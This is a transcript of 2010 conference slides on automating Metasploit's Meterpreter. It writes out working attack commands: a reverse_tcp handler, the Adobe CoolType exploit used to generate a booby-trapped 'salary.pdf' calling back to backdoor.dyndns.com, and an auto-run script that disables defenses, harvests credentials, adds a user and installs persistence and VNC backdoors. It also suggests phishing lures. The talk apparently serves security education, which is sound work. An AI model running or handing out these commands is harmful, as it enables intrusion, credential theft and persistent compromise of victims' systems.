Inside Metasploit Understanding Meterpreter - NoThink · use...
Transcript of Inside Metasploit Understanding Meterpreter - NoThink · use...
![Page 1: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/1.jpg)
INSIDE METASPLOITAUTOMATING METERPRETER
![Page 2: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/2.jpg)
A penetration testing and development platform for creating security tools and exploits.
Used by network security professionals to perform penetration tests, system administrators, product vendors, and security researchers world-wide.
Metasploit can be used for both good and evil
http://www.metasploit.com
WHAT IS METASPLOIT?
![Page 3: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/3.jpg)
Install packages available for Linux, BSD, Mac OS X, Cygwin, Windows2000/XP/2003/Vista
http://www.metasploit.com/framework/download/
Once installed, it is easy to update! In working directory type: svn up
hevnsnts-MacBook-Pro:msf3 hevnsnt$ svn upU external/source/gui/msfguijava/src/msfgui/PayloadPopup.formU scripts/meterpreter/enum_powershell_env.rbU scripts/meterpreter/winenum.rbU scripts/meterpreter/credcollect.rb..................A scripts/meterpreter/file_collector.rbA data/exploits/cve-2010-2883.ttfUpdated to revision 10299.
INSTALLATION – UPDATING
![Page 4: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/4.jpg)
Everything you need to know in one slideStarting msfconsole
•./msfconsole•just keep typing “banner” until you get the cow
Simple Exploitation•Define [Exploit]•Define [Payload]•Define Listener•show options / advanced•Exploit
![Page 5: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/5.jpg)
Reflective DLL, Doesn’t write any functions to disk.
SSL Encryption for all modules, TLV Commands, Session Traffic, Migration.
Hows and whys: http://pauldotcom.com/2009/07/meterpreter-stealthier-than-ev.html
About Meterpreter
![Page 6: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/6.jpg)
The Reverse Meterpreter Setup
Listener(LHOST)
Victim(RHOST)
![Page 7: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/7.jpg)
The Reverse Meterpreter Setup
Listener(LHOST)
Victim(RHOST)
![Page 8: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/8.jpg)
The Reverse Meterpreter Setup
Listener(LHOST)
Victim(RHOST)
![Page 9: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/9.jpg)
use exploit/multi/handler Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.9Set LPORT 4444Set ExitOnSession falseexploit -j -z
The Multi/Handler
![Page 10: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/10.jpg)
The Reverse Meterpreter Setup
The “multi/handler”(LHOST)
![Page 11: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/11.jpg)
The Reverse Meterpreter Setup
The “multi/handler”(LHOST)
![Page 12: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/12.jpg)
But we are not going to do it that way
I <3 adobe
use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.comset FILENAME salary.pdfexploit
[*] Creating 'salary.pdf' file...[*] Generated output file /pentest/msf3/data/exploits/salary.pdf[*] Exploit completed, but no session was created.
[ still unpa
tched ]
![Page 13: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/13.jpg)
Why choose Meterpreter?
![Page 14: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/14.jpg)
Why choose Meterpreter?
man meterpreter
![Page 15: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/15.jpg)
•“no manual entry for meterpreter” so type “?” instead. That’s why•Let’s have some Meterpreter fun
•“getuid” & “getpid”•“ps” to get process list•“migrate [process]” into that process•“getsystem”•“shell”•“hashdump”•“upload”
Why choose Meterpreter?
![Page 16: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/16.jpg)
We own the box, So what should we do?
![Page 17: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/17.jpg)
We own the box, So what should we do?
- disable defenses
- get system passwords
- add a user
- add a backdoor
- get screenshot
![Page 18: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/18.jpg)
Meterpreter Scripts./msf3/scripts/meterpreter/
D A R K O P E R AT O R P W N S .!
run [scriptname]
![Page 19: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/19.jpg)
use exploit/multi/handler Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.9Set LPORT 4444Set ExitOnSession falseexploit -j -z
The Multi/Handler
But WAIT!
![Page 20: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/20.jpg)
set AutoRunScript scripts/meterpreter/[script].rb
NEVER FORGET
![Page 21: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/21.jpg)
Automate
#Meterpreter script for running multiple scripts on a Meterpreter Session#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
"-rc" Text file with list of commands, one per line
![Page 22: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/22.jpg)
PUTTING IT ALL TOGETHER…
![Page 23: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/23.jpg)
What did we want it to do?
Let’s automate
- disable defenses
- get system passwords
- add a user
- add a backdoor
-get screenshotConsider multi.txt
getcountermeasure -k -dmigrate explorer.execredcollectenum_firefoxenum_puttygetgui -u vmware3889 -p Luuulzpersistence -X -i 30 -p 5465 -r backdoor.dyndns.comvnc -r backdoor.dyndns.com -D
![Page 24: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/24.jpg)
Did you know msfconsole (metasploit) is scriptable?
Consider ListenReady.rcuse exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.9set LPORT 4444set ExitOnSession falseset AutoRunScript multiscript -rc /path/to/multi.txtexploit -j -z
./msfconsole –r ListenReady.rc
Lets begin our multi/handler
![Page 25: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/25.jpg)
Search Gmail for “ATM +Nigeria”
And Reply ;)
![Page 26: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/26.jpg)
The Setup
AutoRunScript
![Page 27: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/27.jpg)
The Setup
- disable defenses- get system passwords- add a user- add a backdoor- get screenshot
![Page 28: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/28.jpg)
15th Ann. October 2nd 2010
![Page 29: Inside Metasploit Understanding Meterpreter - NoThink · use exploit/windows/fileformat/adobe_cooltype_sing Set PAYLOAD windows/meterpreter/reverse_tcp set LHOST backdoor.dyndns.com](https://reader031.fdocuments.in/reader031/viewer/2022013104/5ac2a57d7f8b9a433f8e4fd2/html5/thumbnails/29.jpg)
QUESTIONS?
Bill Swearingen, CISSPTwitter: @hevnsntemail: [email protected]
Slides are available now:http://snipurl.com/bsides917
(VIA PDF OF COURSE)